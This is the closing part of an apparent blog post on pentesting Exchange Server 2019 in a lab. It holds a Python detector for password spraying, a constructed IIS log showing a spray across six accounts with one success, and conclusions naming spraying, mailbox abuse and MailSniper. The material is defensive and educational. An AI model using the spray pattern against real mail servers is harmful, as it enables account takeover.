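            if len(users) >= min_users or len(in_window) >= min_failures:
                alerts.append({"ip": ip, "first": t0.isoformat(), "last": in_window[-1][0].isoformat(),
                               "failures": len(in_window), "users": sorted(users)})
                break                                 # one alert per source is enough for triage
    return alerts


# Constructed sample: 10.3.10.50 sprays six accounts over EAS and gets one hit; 10.3.10.7 is a real
# phone mistyping a password twice; 10.3.10.60 just opens the OWA logon page.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-10-15 13:01:02 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=jon.snow&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 12
2025-10-15 13:01:03 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=cersei.lannister&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 11
2025-10-15 13:01:04 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=tyrion.lannister&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 10
2025-10-15 13:01:05 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=jaime.lannister&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 12
2025-10-15 13:01:06 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=sansa.stark&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 11
2025-10-15 13:01:07 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=arya.stark&DeviceId=A1&DeviceType=iPhone 443 - 10.3.10.50 Apple-iPhone12C1/1801.1 - 401 1 0 13
2025-10-15 13:01:08 10.3.10.21 OPTIONS /Microsoft-Server-ActiveSync User=cersei.lannister&DeviceId=A1&DeviceType=iPhone 443 SEVENKINGDOMS\\cersei.lannister 10.3.10.50 Apple-iPhone12C1/1801.1 - 200 0 0 45
2025-10-15 13:02:30 10.3.10.21 POST /EWS/Exchange.asmx - 443 - 10.3.10.7 Outlook-iOS/2.0 - 401 1 0 9
2025-10-15 13:02:41 10.3.10.21 POST /EWS/Exchange.asmx - 443 - 10.3.10.7 Outlook-iOS/2.0 - 401 1 0 8
2025-10-15 13:02:50 10.3.10.21 POST /EWS/Exchange.asmx - 443 SEVENKINGDOMS\\robb.stark 10.3.10.7 Outlook-iOS/2.0 - 200 0 0 120
2025-10-15 13:03:00 10.3.10.21 GET /owa/auth/logon.aspx url=https://10.3.10.21/owa/&reason=0 443 - 10.3.10.60 Mozilla/5.0 - 200 0 0 30
"""

if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG.splitlines()):
        print(alert)
```

The thresholds are deliberately conservative: one address failing for five different accounts within five minutes is almost never a legitimate client, while the min_failures fallback catches sprays against endpoints where the log cannot name the user. In a real deployment the same logic runs in the SIEM over the IIS logs of every Client Access server, and the Exchange HttpProxy logs add the user for OWA logons that IIS cannot attribute.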

Conclusions

Penetration testing Exchange Server 2019 calls for a structured methodology: thorough reconnaissance, targeted attacks such as password spraying, and post-compromise mailbox abuse to turn a single account into a foothold in the network.

The GOADv3 lab on Ludus/Debian provides an ideal environment to safely simulate these techniques, allowing you to hone your offensive capabilities and, most importantly, test your IT defenses.

Using tools like MailSniper makes it easier to search for credentials, permissions, and sensitive data, clearly demonstrating the risk an Exchange compromise poses to an organization.

Implementing robust defenses and continuous monitoring is key to reducing the attack surface and slowing down today’s cyber adversaries.

If you’re interested, I can also provide an automated PowerShell script for some of the procedures above at a later date.



Th3R3dP1ll
Cruise Director for six months of the year, he speaks Italian, English, German, French, Spanish, Portuguese and Russian and is currently studying Japanese. He holds CompTIA A+, Network+, Security+ and PenTest+ and the eJPT, and is now studying for the eCPPT and PNPT. In his spare time he plays sports and reads or listens to books for 60 to 120 minutes a day. He argues that with great power comes great responsibility, such as educating those who struggle to navigate the digital world and, when needed, defending them from "pirates" and from entities that harm the planet and people's freedom. He also argues that the natural future of biological life is fusion and integration with the digital, a transition that has already begun with the transhumanism movement, of which he is an advocate.
